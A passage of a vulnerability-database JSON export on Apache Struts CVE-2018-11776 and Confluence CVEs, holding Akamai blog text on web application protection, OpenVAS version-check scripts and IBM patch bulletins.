having to configure dozens of appliances with every rule change.\n * **Look for anomalies, not Common Vulnerabilities and Exposures (CVEs). ** \nA CVE-based approach to WAF rules is unwieldy to manage and never gets ahead of the problem. Architecting the WAF around an anomaly scoring engine makes it easier to scale and has been [proven effective against some zero-day vulnerabilities](<https://blogs.akamai.com/sitr/2018/08/-attack-status-apache-struts-vulnerability-cve-2018-11776.html>).\n * **Curate WAF rules for customers.** \nThe most recent [Forrester Wave report on WAFs](<https://www.akamai.com/us/en/campaign/assets/reports/forrester-waf-wave-q1-2020.jsp>) gave high marks to Akamai's internal threat intelligence. Most organizations don't have enough security resources to manage a WAF over time. Akamai threat researchers help by continuously updating and testing WAF rules against live traffic to make enablement easier for customers.\n * **Leverage machine learning where it makes sense.** \nMost security teams won't trust an algorithm to update their WAF rules. Instead, Akamai uses machine learning to analyze live traffic (including 178 billion rule triggers a day) to identify anomalies requiring analysis by Akamai threat researchers.\n * **Automate as much as you can.** \nBecause of limited resources, most customers only protect their most critical applications, leaving many applications unprotected. Akamai developed [automated protections](<https://developer.akamai.com/blog/2018/10/10/quickly-protect-your-website-automatically-updated-waf-policies>) to protect the rest of the application footprint with a one-time click.\n * **Apply protection based on risk.** \nA reputation-based approach is a common example of protection-based risk. However, it is more effective to go beyond a simple binary score to provide a more accurate risk assessment. This can be done by creating [tailored risk scores based on attacker behavior against other customers and industries](<https://www.akamai.com/us/en/multimedia/documents/white-paper/5-phases-of-custom-risk-scoring.pdf>). In October, we'll be talking more about how to go beyond IP reputation and adapt WAF protections based on risk -- [stay tuned](<https://blogs.akamai.com/>).\n\n### [![waf_daily_attacks_2019-06-01_2020-05-31.jpg](https://blogs.akamai.com/assets_c/2020/09/waf_daily_attacks_2019-06-01_2020-05-31-thumb-700xauto-10954.jpg)](<https://blogs.akamai.com/waf_daily_attacks_2019-06-01_2020-05-31.jpg>)API Security for Agile Organizations \n\n\n[API security](<https://www.akamai.com/uk/en/solutions/performance/api-security.jsp>) provides an industry-wide lesson on the need to provide a bridge between security teams and developers. Akamai introduced a positive security model for API protection in 2017, allowing customers to define API endpoints with Akamai to drop abnormal traffic and apply web application firewall (WAF) inspection. However, this required security teams to have visibility into the APIs developers are creating, which has proven challenging for most organizations. To help bridge that gap, Akamai recommends that API security does the following:\n\n * **Automatically inspect all API traffic.** \nAkamai now [automatically inspects all XML and JSON traffic](<https://blogs.akamai.com/2019/03/automated-api-protection-with-wap.html>) for web application attacks without requiring APIs to be defined and registered with Akamai. \n\n * **Automatically discover new API endpoints.** \nIn October, we'll be talking about an exciting new capability that will finally allow security teams to keep up with changing APIs by discovering API endpoints and their definitions -- integrated with WAF protections. Stay tuned and check [our blog](<https://blogs.akamai.com/>) for updates.\n\n### Detecting 12 Billion Bot Requests Daily \n\n\nUnlike DDoS and web application attacks, where attacks can often be identified based on traffic volume or signature, bot attacks have always attempted to blend with human traffic to go undetected. In addition, the more sophisticated bot operators continuously evolve in their attempts to evade detections. \n\nThis has driven a major shift in how the industry has approached the problem. Akamai recommends the following practices:\n\n * **Leverage signature-based rules.** \nBasic bot detection looks like a WAF, with rules based on bot signatures. These basic detections can still easily detect \"dumb bots\" comprising more than 50% of bot traffic, allowing advanced detections to focus on more sophisticated bots.\n * **Look for anomalies, not attacks. ** \nAs bots continue to better mimic human behavior, identifying sophisticated bots requires dropping all preconceived notions of what a bot may look like. Instead, machine learning algorithms such as [adaptive anomaly clustering](<https://blogs.akamai.com/2019/03/bot-manager-staying-ahead-of-the-bot-landscape.html>) look for anomalies in traffic and signals collected from the 1.3 billion devices that Akamai sees daily. \n\n * **Trust machine learning findings that review a lot of data. ** \nDetecting bots requires an algorithmic approach to correlating signals across different applications and customers in real time. However, machine learning requires lots of data to ensure accuracy. Akamai feeds signals from unmatched volumes of first-party data -- 1.3 billion unique clients per day and hundreds of Tbps of traffic -- into our machine learning algorithms to detect 12 billion bot requests and 280 million bot logins every day.\n * **Manage, don't mitigate.** \nWhile bots may be easy to block, bot management remains a cat-and-mouse game between attackers and security vendors. Unlike traditional tools, Akamai's inline architecture provides a wide array of response options to help manage the long-term impacts of bots.\n\n### The Newest Frontier: In-Browser Threats \n\n\n[Magecart-style attacks](<https://blogs.akamai.com/sitr/2018/11/an-introduction-to-magecart.html>) started hitting the mainstream in 2018, with major breaches at Ticketmaster, Newegg, and British Airways. These attacks are characterized by the ability to compromise scripts running on modern web pages. \n\nThese new types of attacks prove that new attack vectors will continue to be discovered as underlying applications continue to change. In response, security technology will continue to evolve as well. \n\nFor in-browser threats like Magecart, Akamai has shifted its approach again to:\n\n * **Protect in the browser, not in the application.** \nMagecart-style attacks occur in every client's browser, invisible to traditional security tools. Detecting and mitigating compromised scripts running in the browser require implementing [protection](<https://www.akamai.com/us/en/products/security/page-integrity-manager.jsp>) into the browser.\n * **Continuously monitor script behavior. ** \nSophisticated script attacks can be executed in a fraction of a second and gone before you notice them. Akamai's unique approach continuously monitors script behavior, allowing you to catch even transient threats.\n * **Look for anomalies even in legitimate scripts. ** \nWith malicious code injected into compromised scripts, in-browser threat protection must identify unusual changes in behavior even for well-known, legitimate scripts.\n\nFrom SQL injections to Magecart, the challenge of protecting web applications and APIs will continue to grow -- with new attack vectors to protect against as well as changing applications. Navigating the evolving threat landscape requires an expanding kit of tools, solutions, and vendors to reduce the risk of doing business online. \n\n\n### Beyond WAAP: Enterprise and Carrier Security\n\nWhile often the most high-profile targets, data breaches are not limited to web applications. [Gartner's secure access service edge (SASE)](<https://blogs.akamai.com/2019/11/security-at-the-edge-what-is-gartners-sase-why-does-it-matter.html>) provides organizations with a broader framework through which to think through your security approach, including [secure web gateway (SWG)](<https://blogs.akamai.com/2020/03/akamai-enhances-enterprise-threat-protector-to-add-secure-web-gateway-capabilities.html>), [Zero Trust Access](<https://www.akamai.com/us/en/campaign/assets/reports/gartner-2020-market-guide-for-zero-trust-network-access.jsp>), and [DNS security](<https://www.akamai.com/us/en/solutions/security/dns-security-services.jsp>). Every organization should evaluate their full needs and map to different approaches as well as potential solutions. For more information on these markets and more, please see:\n\n * [2019 Gartner Magic Quadrant for Web Application Firewalls](<https://www.akamai.com/us/en/campaign/assets/reports/2019-gartner-magic-quadrant-for-web-application-firewalls.jsp>)\n * [2019 Gartner Critical Capabilities for Web Application Firewall Services](<https://www.akamai.com/us/en/campaign/assets/reports/gartner-waf-critical-capabilities-report-2019.jsp>)\n * [Forrester Wave\u2122: Zero Trust eXtended Ecosystem Platform Providers, Q4 2019](<https://www.akamai.com/us/en/campaign/assets/reports/forrester-zero-trust-wave-q4-2019-report.jsp>)\n * [Forrester Wave\u2122: Web Application Firewalls, Q1 2020](<https://www.akamai.com/us/en/campaign/assets/reports/forrester-waf-wave-q1-2020.jsp>)\n * [Forrester New Wave\u2122: Bot Management, Q1 2020](<https://www.akamai.com/us/en/campaign/assets/reports/2020-forrester-new-wave-bot-management.jsp>)\n![](http://feeds.feedburner.com/~r/TheAkamaiBlog/~4/I-xYBbhp75M)", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-09-09T13:00:00", "type": "akamaiblog", "title": "Web Application and API Protection -- From SQL Injection to Magecart", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2020-09-09T12:10:50", "id": "AKAMAIBLOG:23A2DE4EE8CE0AE43558095CBB5694B1", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/I-xYBbhp75M/web-application-and-api-protection-from-sql-injection-to-magecart.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T18:37:29", "description": "Recently Atlassian has disclosed a critical RCE (Remote Code Execution) vulnerability in its Confluence server and Data Center products (CVE-2021-26084), which might allow unauthenticated users to execute arbitrary code on vulnerable servers.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-15T07:00:00", "type": "akamaiblog", "title": "Confluence Server Webwork OGNL Injection (CVE-2021-26084): How Akamai Helps You Protect Against Zero-Day Attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-15T07:00:00", "id": "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E", "href": "https://www.akamai.com/blog/security/confluence-server-webwork-ognl-injection--cve-2021-26084---how-a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:40:36", "description": "Recently Atlassian has disclosed a critical RCE (Remote Code Execution) vulnerability in its Confluence server and Data Center products (CVE-2021-26084), which might allow unauthenticated users to execute arbitrary code on vulnerable servers.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T07:00:00", "type": "akamaiblog", "title": "Confluence Server Webwork OGNL Injection (CVE-2021-26084): How Akamai Helps You Protect Against Zero-Day Attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-15T07:00:00", "id": "AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "href": "https://www.akamai.com/blog/security/confluence-server-webwork-ognl-injection-cve-2021-26084", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-28T15:05:44", "description": "The Atlassian Confluence vulnerability is here to stay. See Akamai's research into the stats two weeks after the advisory was released.", "cvss3": {}, "published": "2022-06-28T13:00:00", "type": "akamaiblog", "title": "Akamai?s Observations of Confluence Zero Day (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-28T13:00:00", "id": "AKAMAIBLOG:99D943E3269E3EABFC3348509D099BA8", "href": "https://www.akamai.com/blog/security/atlassian-confluence-vulnerability-observations", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-17T22:30:08", "description": "The Atlassian Confluence vulnerability is here to stay. See Akamai's research into the stats two weeks after the advisory was released.", "cvss3": {}, "published": "2022-06-28T13:00:00", "type": "akamaiblog", "title": "Akamai?s Observations of Confluence Zero Day (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-28T13:00:00", "id": "AKAMAIBLOG:6B355C8FD4C2D8E5A670002BC4BD9497", "href": "https://www.akamai.com/blog/security-research/atlassian-confluence-vulnerability-observations", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-03T15:40:36", "description": "Atlassian has released a security advisory to address a remote code execution vulnerability (CVE-2022-26134) that?s affecting Confluence Server and Data Center products.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T09:00:00", "type": "akamaiblog", "title": "Akamai Protects Against the Atlassian Confluence 0-Day (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T09:00:00", "id": "AKAMAIBLOG:4A411E7E1CF65A8662ABD43534726FEF", "href": "https://www.akamai.com/blog/security/akamai-protects-against-atlassian-confluence-0-day", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2023-04-18T15:19:39", "description": "struts2-core is vulnerable to remote code execution (RCE) attacks. These attacks are possible when using a `namespace` or `url` tag which doesn't have a `value` and `action` set and where its upper action configuration is using a wildcard `namespace` or has no `namespace`.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-22T17:36:38", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2020-07-16T05:52:58", "id": "VERACODE:7342", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-7342/summary", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:33:27", "description": "This host is running Apache Struts and is\n prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813786", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813786", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813786\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-23 12:45:43 +0530 (Thu, 23 Aug 2018)\");\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057)\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions\n when namespace value isn't set for a result defined in underlying configurations\n and in same time, its upper action(s) configurations have no or wildcard\n namespace. Same possibility when using url tag which doesn't have value and\n action set and in same time, its upper action(s) configurations have no or\n wildcard namespace.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attacker to possibly conduct remote code on the affected application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34,\n and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or\n 2.5.17 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:appPort, exit_no_version:TRUE)) exit(0);\nappVer = infos['version'];\npath = infos['location'];\n\nif(version_in_range(version:appVer, test_version:\"2.3\", test_version2:\"2.3.34\")){\n fix = \"2.3.35\";\n}\nelse if(version_in_range(version:appVer, test_version:\"2.5\", test_version2:\"2.5.16\")){\n fix = \"2.5.17\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:appPort);\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:44:50", "description": "It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108792", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108792", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108792\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2018-11776\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace.\");\n\n script_tag(name:\"insight\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace. (Vulnerability ID: HWPSIRT-2018-08200)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2018-11776.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this vulnerability to perform a remote code execution attack\");\n\n script_tag(name:\"affected\", value:\"Seco VSM versions V200R002C00\n\neLog versions V200R005C00 V200R006C10 V200R007C00SPC100\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20181121-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2023-02-21T21:47:28", "description": "## Summary\n\nIBM Security Guardium has addressed the following vulnerability. \n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected IBM Security Guardium**\n\n| \n\n**Affected Versions** \n \n---|--- \nIBM Security Guardium | 10.1.4-10.5 \n \n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**Remediation / First Fix** \n \n---|---|--- \nIBM Security Guardium | 10.1.4 | https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FInfoSphere+Guardium&fixids=SqlGuard_10.0p413_Apache-Struts-Vulnerability-Fix&source=SAR&function=fixId&parent=IBM%20Security \nIBM Security Guardium | 10.5 | https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FInfoSphere+Guardium&fixids=SqlGuard_10.0p512_Sep-24-2018&source=SAR&function=fixId&parent=IBM%20Security \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-28T04:30:01", "type": "ibm", "title": "Security Bulletin: IBM Security Guardium is affected by a Publicly disclosed Apache Struts vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-28T04:30:01", "id": "B7DFEA0F0D26A9AEA7F776C2117CB1186584920235B808CDC32E52053CB3C6B0", "href": "https://www.ibm.com/support/pages/node/732783", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T18:08:35", "description": "## Summary\n\nThere is a vulnerability in Apache Struts which the IBM FlashSystem\u2122 840 and 900 are susceptible. An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system. \n \n\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFlashSystem 840 machine type and models (MTMs) affected include 9840-AE1 and 9843-AE1. \nFlashSystem 900 MTMs affected include 9840-AE2 and 9843-AE2.\n\nSupported code versions which are affected\n\n * VRMFs prior to 1.4.8.1\n * VRMFs prior to 1.5.2.1\n\n## Remediation/Fixes\n\nMTMs | VRMF | APAR | Remediation/First Fix \n---|---|---|--- \n \nFlashSystem 840 MTMs:\n\n9840-AE1 & 9843-AE1\n\nFlashSystem 900 MTMs:\n\n9840-AE2, 9843-AE2, 9840-AE3, & 9843-AE3\n\n| \n\nCode fixes are now available, the minimum VRMF containing the fix depending on the code stream:\n\n_Fixed Code VRMF_\n\n1.5 stream: 1.5.2.1\n\n1.4 stream: 1.4.8.1\n\n| N/A | FlashSystem 840 fixes and FlashSystem900 fixes are available @ [IBM's Fix Central](<https://www-945.ibm.com/support/fixcentral>) \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": 